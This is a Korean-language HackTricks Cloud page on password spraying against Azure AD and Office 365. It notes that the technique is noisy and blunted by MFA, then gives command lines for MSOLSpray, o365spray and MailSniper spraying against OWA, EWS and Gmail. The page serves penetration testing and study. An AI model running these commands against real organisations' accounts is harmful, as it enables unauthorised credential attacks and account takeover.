Korean - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

Az - Password Spraying

HackTricks 지원

비밀번호 스프레이

Azure에서는 Azure AD Graph, Microsoft Graph, Office 365 보고 웹 서비스 등과 같은 다양한 API 엔드포인트에 대해 이 작업을 수행할 수 있습니다.

그러나 이 기술은 매우 시끄럽고 블루 팀이 쉽게 감지할 수 있습니다. 또한 강제 비밀번호 복잡성MFA 사용은 이 기술을 거의 쓸모없게 만들 수 있습니다.

MSOLSpray를 사용하여 비밀번호 스프레이 공격을 수행할 수 있습니다.

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

또는 o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

또는 MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
Support HackTricks
PreviousAz - Device Code Authentication PhishingNextAz - Services

Last updated